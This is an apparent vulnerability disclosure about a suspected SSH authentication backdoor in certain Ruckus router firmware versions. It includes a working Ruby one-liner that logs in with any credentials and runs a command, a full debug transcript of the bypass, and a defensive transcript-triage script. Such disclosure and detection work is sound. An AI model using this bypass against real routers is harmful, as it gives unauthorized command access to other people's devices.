Analysis of a Suspected Backdoor in Ruckus Routers (优科路由器)
1. Overview
Recently, while analyzing the NetScreen backdoor, the 白帽汇 (BaiMaoHui) security team happened to discover that a certain version of Ruckus Router firmware also shows suspected backdoor behaviour: commands can be executed directly without holding any account. So far we have identified at least several hundred affected devices reachable on the Internet.
The affected versions found so far are 4.1.0.96 and 4.2.0.0.132; we are not yet sure whether this is a previously known issue.
2. Technical analysis
Normally, connecting to the device over SSH prompts for a username and password, for example:
$ ssh 8.40.x.x
Please login: admin
password :
Login incorrect
Please login:
We use net-ssh under Ruby to drive the SSH protocol and print its debug output:
$ irb
2.1.5 :233 > require 'net/ssh'
2.1.5 :233 > Net::SSH.start('8.40.x.x', 'any', :password => %q|anychar|,:verbose=>:debug,:auth_methods => ["password"]) do |ssh|; puts ssh.exec!("get version"); end
D, [2015-12-24T13:36:52.577626 #6230] DEBUG -- net.ssh.transport.session[3fc639464fa8]: establishing connection to 8.40.x.x:22
D, [2015-12-24T13:36:52.935203 #6230] DEBUG -- net.ssh.transport.session[3fc639464fa8]: connection established
I, [2015-12-24T13:36:52.935285 #6230] INFO -- net.ssh.transport.server_version[3fc6390b5ba0]: negotiating protocol version
D, [2015-12-24T13:36:53.342534 #6230] DEBUG -- net.ssh.transport.server_version[3fc6390b5ba0]: remote is `SSH-2.0-dropbear_0.48'
D, [2015-12-24T13:36:53.342590 #6230] DEBUG -- net.ssh.transport.server_version[3fc6390b5ba0]: local is `SSH-2.0-Ruby/Net::SSH_3.0.1 x86_64-darwin14.0'
D, [2015-12-24T13:36:53.756625 #6230] DEBUG -- socket[3fc6394645f8]: read 344 bytes
D, [2015-12-24T13:36:53.756732 #6230] DEBUG -- socket[3fc6394645f8]: received packet nr 0 type 20 len 340
I, [2015-12-24T13:36:53.756796 #6230] INFO -- net.ssh.transport.algorithms[3fc6390b4598]: got KEXINIT from server
I, [2015-12-24T13:36:53.756848 #6230] INFO -- net.ssh.transport.algorithms[3fc6390b4598]: sending KEXINIT
D, [2015-12-24T13:36:53.757020 #6230] DEBUG -- socket[3fc6394645f8]: queueing packet nr 0 type 20 len 1684
D, [2015-12-24T13:36:53.757140 #6230] DEBUG -- socket[3fc6394645f8]: sent 1688 bytes
I, [2015-12-24T13:36:53.757176 #6230] INFO -- net.ssh.transport.algorithms[3fc6390b4598]: negotiating algorithms
D, [2015-12-24T13:36:53.757274 #6230] DEBUG -- net.ssh.transport.algorithms[3fc6390b4598]: negotiated:
* kex: diffie-hellman-group1-sha1
* host_key: ssh-rsa
* encryption_server: aes128-cbc
* encryption_client: aes128-cbc
* hmac_client: hmac-sha1
* hmac_server: hmac-sha1
* compression_client: none
* compression_server: none
* language_client:
* language_server:
D, [2015-12-24T13:36:53.757299 #6230] DEBUG -- net.ssh.transport.algorithms[3fc6390b4598]: exchanging keys
D, [2015-12-24T13:36:53.757886 #6230] DEBUG -- socket[3fc6394645f8]: queueing packet nr 1 type 30 len 140
D, [2015-12-24T13:36:53.757930 #6230] DEBUG -- socket[3fc6394645f8]: sent 144 bytes
D, [2015-12-24T13:36:57.345886 #6230] DEBUG -- socket[3fc6394645f8]: read 720 bytes
D, [2015-12-24T13:36:57.346065 #6230] DEBUG -- socket[3fc6394645f8]: received packet nr 1 type 31 len 700
D, [2015-12-24T13:36:57.415697 #6230] DEBUG -- socket[3fc6394645f8]: queueing packet nr 2 type 21 len 20
D, [2015-12-24T13:36:57.415823 #6230] DEBUG -- socket[3fc6394645f8]: sent 24 bytes
D, [2015-12-24T13:36:57.416003 #6230] DEBUG -- socket[3fc6394645f8]: received packet nr 2 type 21 len 12
D, [2015-12-24T13:36:57.416275 #6230] DEBUG -- net.ssh.authentication.session[3fc6388b4078]: beginning authentication of `any'
D, [2015-12-24T13:36:57.416374 #6230] DEBUG -- socket[3fc6394645f8]: queueing packet nr 3 type 5 len 28
D, [2015-12-24T13:36:57.416431 #6230] DEBUG -- socket[3fc6394645f8]: sent 52 bytes
D, [2015-12-24T13:36:58.155451 #6230] DEBUG -- socket[3fc6394645f8]: read 52 bytes
D, [2015-12-24T13:36:58.155590 #6230] DEBUG -- socket[3fc6394645f8]: received packet nr 3 type 6 len 28
D, [2015-12-24T13:36:58.155742 #6230] DEBUG -- net.ssh.authentication.session[3fc6388b4078]: trying password
D, [2015-12-24T13:36:58.155889 #6230] DEBUG -- socket[3fc6394645f8]: queueing packet nr 4 type 50 len 60
D, [2015-12-24T13:36:58.155950 #6230] DEBUG -- socket[3fc6394645f8]: sent 84 bytes
D, [2015-12-24T13:36:58.490987 #6230] DEBUG -- socket[3fc6394645f8]: read 36 bytes
D, [2015-12-24T13:36:58.491177 #6230] DEBUG -- socket[3fc6394645f8]: received packet nr 4 type 52 len 12
D, [2015-12-24T13:36:58.491277 #6230] DEBUG -- net.ssh.authentication.methods.password[3fc6388b3ee8]: password succeeded
D, [2015-12-24T13:36:58.491429 #6230] DEBUG -- socket[3fc6394645f8]: queueing packet nr 5 type 90 len 44
D, [2015-12-24T13:36:58.491552 #6230] DEBUG -- socket[3fc6394645f8]: sent 68 bytes
D, [2015-12-24T13:36:58.876109 #6230] DEBUG -- socket[3fc6394645f8]: read 52 bytes
D, [2015-12-24T13:36:58.876301 #6230] DEBUG -- socket[3fc6394645f8]: received packet nr 5 type 91 len 28
I, [2015-12-24T13:36:58.876449 #6230] INFO -- net.ssh.connection.session[3fc6388b29a8]: channel_open_confirmation: 0 0 8000 8000
I, [2015-12-24T13:36:58.876648 #6230] INFO -- net.ssh.connection.channel[3fc6388b2840]: sending channel request "env"
D, [2015-12-24T13:36:58.876769 #6230] DEBUG -- socket[3fc6394645f8]: queueing packet nr 6 type 98 len 44
I, [2015-12-24T13:36:58.876924 #6230] INFO -- net.ssh.connection.channel[3fc6388b2840]: sending channel request "exec"
D, [2015-12-24T13:36:58.877018 #6230] DEBUG -- socket[3fc6394645f8]: queueing packet nr 7 type 98 len 44
D, [2015-12-24T13:36:58.877221 #6230] DEBUG -- socket[3fc6394645f8]: sent 136 bytes
D, [2015-12-24T13:36:59.291831 #6230] DEBUG -- socket[3fc6394645f8]: read 36 bytes
D, [2015-12-24T13:36:59.292027 #6230] DEBUG -- socket[3fc6394645f8]: received packet nr 6 type 99 len 12
I, [2015-12-24T13:36:59.292122 #6230] INFO -- net.ssh.connection.session[3fc6388b29a8]: channel_success: 0
D, [2015-12-24T13:36:59.296051 #6230] DEBUG -- socket[3fc6394645f8]: read 84 bytes
D, [2015-12-24T13:36:59.296180 #6230] DEBUG -- socket[3fc6394645f8]: received packet nr 7 type 94 len 60
I, [2015-12-24T13:36:59.296248 #6230] INFO -- net.ssh.connection.session[3fc6388b29a8]: channel_data: 0 35b
D, [2015-12-24T13:36:59.691776 #6230] DEBUG -- socket[3fc6394645f8]: read 140 bytes
D, [2015-12-24T13:36:59.691968 #6230] DEBUG -- socket[3fc6394645f8]: received packet nr 8 type 96 len 12
I, [2015-12-24T13:36:59.692040 #6230] INFO -- net.ssh.connection.session[3fc6388b29a8]: channel_eof: 0
D, [2015-12-24T13:36:59.692225 #6230] DEBUG -- socket[3fc6394645f8]: received packet nr 9 type 98 len 44
I, [2015-12-24T13:36:59.692342 #6230] INFO -- net.ssh.connection.session[3fc6388b29a8]: channel_request: 0 exit-status false
D, [2015-12-24T13:36:59.692477 #6230] DEBUG -- socket[3fc6394645f8]: received packet nr 10 type 97 len 12
I, [2015-12-24T13:36:59.692523 #6230] INFO -- net.ssh.connection.session[3fc6388b29a8]: channel_close: 0
D, [2015-12-24T13:36:59.692613 #6230] DEBUG -- socket[3fc6394645f8]: queueing packet nr 8 type 97 len 28
Ruckus Router
Version: 4.2.0.0.132
I, [2015-12-24T13:36:59.692674 #6230] INFO -- net.ssh.connection.session[3fc6388b29a8]: closing remaining channels (0 open)
=> nil
2.1.5 :234 >
In the test above we can see that, with an arbitrary username and an arbitrary password, plus the command we want to run (here get version), the login check is bypassed and the command is executed directly: the server answers the password attempt with "password succeeded" and then returns the output of get version over the exec channel.
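To make this finding checkable offline, the following added example (not code from the original post) triages a net-ssh :verbose => :debug transcript like the one above: it extracts the server banner, the probe username, whether password authentication was accepted, and the Version line returned by the device, then flags an accepted password for a throwaway user as the anomaly described here. The affected version list and the probe user 'any' are taken from this post; the sample transcript is constructed to mirror the captured one.

```ruby
# Versions this post reports as affected.
AFFECTED_VERSIONS = %w[4.1.0.96 4.2.0.0.132].freeze

# Constructed sample: a few lines in the shape of the net-ssh debug output above.
SAMPLE_TRANSCRIPT = <<~LOG
  D, [2015-12-24T13:36:53.342534 #6230] DEBUG -- net.ssh.transport.server_version[3fc6390b5ba0]: remote is `SSH-2.0-dropbear_0.48'
  D, [2015-12-24T13:36:57.416275 #6230] DEBUG -- net.ssh.authentication.session[3fc6388b4078]: beginning authentication of `any'
  D, [2015-12-24T13:36:58.155742 #6230] DEBUG -- net.ssh.authentication.session[3fc6388b4078]: trying password
  D, [2015-12-24T13:36:58.491277 #6230] DEBUG -- net.ssh.authentication.methods.password[3fc6388b3ee8]: password succeeded
  Ruckus Router
  Version: 4.2.0.0.132
LOG

# Walk the transcript line by line and collect the facts we care about.
def triage_transcript(text)
  facts = { banner: nil, user: nil, auth_ok: false, version: nil }
  text.each_line do |line|
    case line
    when /remote is `([^']+)'/                   then facts[:banner]  = $1
    when /beginning authentication of `([^']+)'/ then facts[:user]    = $1
    when /password succeeded/                    then facts[:auth_ok] = true
    when /^Version:\s*(\S+)/                     then facts[:version] = $1
    end
  end
  facts
end

# The anomaly from the post: the server accepted a password for a user that
# was never provisioned. Any such acceptance is suspicious on its own.
def suspicious?(facts)
  facts[:auth_ok]
end

# Whether the reported firmware version is one the post lists as affected.
def known_affected?(facts)
  AFFECTED_VERSIONS.include?(facts[:version])
end

if __FILE__ == $PROGRAM_NAME
  f = triage_transcript(SAMPLE_TRANSCRIPT)
  puts "banner=#{f[:banner]} user=#{f[:user]} auth_ok=#{f[:auth_ok]} version=#{f[:version]}"
  puts(suspicious?(f) ? "SUSPICIOUS: password accepted for probe user #{f[:user]}" : "ok")
  puts "version is on the affected list" if known_affected?(f)
end
```

Feed it the saved output of a net-ssh run against a device you administer; a transcript that never reaches "password succeeded" is reported as clean.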